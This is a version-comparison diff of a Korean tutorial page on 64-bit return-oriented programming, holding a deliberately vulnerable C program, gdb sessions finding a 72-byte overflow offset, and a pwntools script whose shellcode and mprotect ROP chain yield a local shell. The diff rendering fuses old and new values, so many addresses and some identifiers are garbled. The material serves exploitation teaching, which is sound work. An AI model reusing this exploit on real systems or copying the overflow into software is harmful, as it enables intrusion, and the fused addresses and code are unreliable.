Versions Compared

Old Version 2

changes.mady.by.user Lazenca.0x0

Saved on

compared with

New Version 3

changes.mady.by.user Lazenca.0x0

Saved on

Key

  • This line was added.
  • This line was removed.
  • Formatting was changed.

...

Code Block
languagecpp
titleroprop64.c
//gcc -fno-stack-protector -o roprop64 roprop64.c -ldl
#define _GNU_SOURCE
#include <stdio.h>
#include <unistd.h>
#include <dlfcn.h>
 
void vuln(){
    char buf[50];
    void (*printf_addr)() = dlsym(RTLD_NEXT, "printf");
    printf("Printf() address : %p\n",printf_addr);
    read(0, buf, 256);
}

void main(){
    write(1,"Hello ROP\n",10);
    vuln();
}

...

Code Block
titleBreakpoints
lazenca0x0@ubuntu:~/Exploit/ROPStager/mprotect$ gdb -q ./roprop64
Reading symbols from ./roprop64...(no debugging symbols found)...done.
gdb-peda$ disassemble vuln 
Dump of assembler code for function vuln:
   0x00000000004006c6 <+0>:		push   rbp
   0x00000000004006c7 <+1>:		mov    rbp,rsp
   0x00000000004006ca <+4>:		sub    rsp,0x40
   0x00000000004006ce <+8>:		mov    esi,0x4007d40x4007c4
   0x00000000004006d3 <+13>:	mov    rdi,0xffffffffffffffff
   0x00000000004006da <+20>:	call   0x4005b0 <dlsym@plt>
   0x00000000004006df <+25>:	mov    QWORD PTR [rbp-0x8],rax
   0x00000000004006e3 <+29>:	mov    rax,QWORD PTR [rbp-0x8]
   0x00000000004006e7 <+33>:	mov    rsi,rax
   0x00000000004006ea <+36>:	mov    edi,0x4007db
   0x00000000004006ef <+41>:	mov    eax,0x0
   0x00000000004006f4 <+46>:	call   0x400580 <printf@plt>
   0x00000000004006f9 <+51>:	lea    rax,QWORD PTR [rbp-0x400x8]
   0x00000000004006fd0x00000000004006e7 <+55>33>:	mov    rsi,rax
   0x00000000004007000x00000000004006ea <+58>36>:	mov    edi,0x4007f20x4007cb
   0x00000000004007050x00000000004006ef <+63>41>:	mov    eax,0x0
   0x000000000040070a0x00000000004006f4 <+68>46>:	call   0x400580 <printf@plt>
   0x000000000040070f0x00000000004006f9 <+73>51>:	lea    rax,[rbp-0x40]
   0x00000000004007130x00000000004006fd <+77>55>:	mov    edx,0x100
   0x00000000004007180x0000000000400702 <+82>60>:	mov    rsi,rax
   0x000000000040071b0x0000000000400705 <+85>63>:	mov    edi,0x0
   0x00000000004007200x000000000040070a <+90>68>:	call   0x400590 <read@plt>
   0x00000000004007250x000000000040070f <+95>73>:	nop
   0x00000000004007260x0000000000400710 <+96>74>:	leave  
   0x00000000004007270x0000000000400711 <+97>75>:	ret    
End of assembler dump.
gdb-peda$ b *0x00000000004006c6
Breakpoint 1 at 0x4006c6
gdb-peda$ b *0x00000000004007200x000000000040070a
Breakpoint 2 at 0x4007200x40070a
gdb-peda$
  • 다음과 같이 Overflow를 확인할 수 있습니다.

    • Return address(0x7fffffffe488) - buf 변수의 시작 주소 (0x7fffffffe440) = 72

    • 즉, 72개 이상의 문자를 입력함으로써 Return address 영역을 덮어 쓸 수 있습니다.
Code Block
titleOverflow
gdb-peda$ r
Starting program: /home/lazenca0x0/Exploit/ROPStager/mprotect/rop rop64
Hello ROP

Breakpoint 1, 0x00000000004006c6 in vuln ()
gdb-peda$ i r rsp
rsp            0x7fffffffe488	0x7fffffffe488
gdb-peda$ c
Continuing.
Printf() address : 0x7ffff785e800
buf[50] address : 0x7fffffffe440

Breakpoint 2, 0x00000000004007200x000000000040070a in vuln ()
gdb-peda$ i r rsi
rsi            0x7fffffffe440	0x7fffffffe440
gdb-peda$ p/d 0x7fffffffe488 - 0x7fffffffe440
$1 = 72
gdb-peda$

...

Code Block
title./rp-lin-x64 -f ./rop -r 1| grep "pop rdi"
lazenca0x0@ubuntu:~/Exploit/ROPStager/mprotect$ ./rp-lin-x64 -f ./roprop64 -r 1| grep "pop rdi"
0x004007b30x004007a3: pop rdi ; ret  ;  (1 found)
lazenca0x0@ubuntu:~/Exploit/ROPStager/mprotect$

...

Code Block
languagepy
titlerop.py
from pwn import *
from struct import *
 
#context.log_level = 'debug'

shellcode = "\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"

libc = ELF("/lib/x86_64-linux-gnu/libc-2.23.so")
libcbase_printf_offset = libc.symbols['printf']
libcbase_mprotect_offset = libc.symbols['mprotect']
 
pop_rdi_ret = 0x004007b30x004007a3 
pop_rdx_ret_offsetpop_rdx_ret_offset = 0x1150c9
 
r = process('./roprop64')
 
r.recvn(10)
r.recvuntil('Printf() address : ')
libcbase = int(r.recvuntil('\n'),16)
libcbase -= libcbase_printf_offset 

r.recvuntil('buf[50] address : ')
stack = int(r.recvuntil('\n'),16)
back = str(hex(stack))
shellArea = int(back[0:11] + '000',16)

log.info(back[0:11])
log.info(hex(shellArea))
log.info("libcbase : " + hex(libcbase))
log.info("stack : " + hex(stack))
log.info("mprotect() : " + hex(libcbase + libcbase_mprotect_offset))

payload = shellcode 
payload += "A" * (72 - len(shellcode))


#mprotect(address of shellcode,0x2000,0x7)
payload += p64(pop_rdi_ret)
payload += p64(shellArea)
payload += p64(libcbase + pop_rdx_ret_offset)
payload += p64(0x7)
payload += p64(0x2000)
payload += p64(libcbase + libcbase_mprotect_offset)
payload += p64(stack)
 
r.send(payload)
r.interactive()
Code Block
titlepython rop.py
lazenca0x0@ubuntu:~/Exploit/ROPStager/mprotect$ python rop.py
[*] '/lib/x86_64-linux-gnu/libc-2.23.so'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
[+] Starting local process './roprop64': pid 43561
[*] 0x7ffd0e0a4
[*] 0x7ffd0e0a4000
[*] libcbase : 0x7fe88a73e000
[*] stack : 0x7ffd0e0a4470
[*] mprotect() : 0x7fe88a83f770
[*] Switching to interactive mode
$ id
uid=1000(lazenca0x0) gid=1000(lazenca0x0) groups=1000(lazenca0x0),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare)
$

...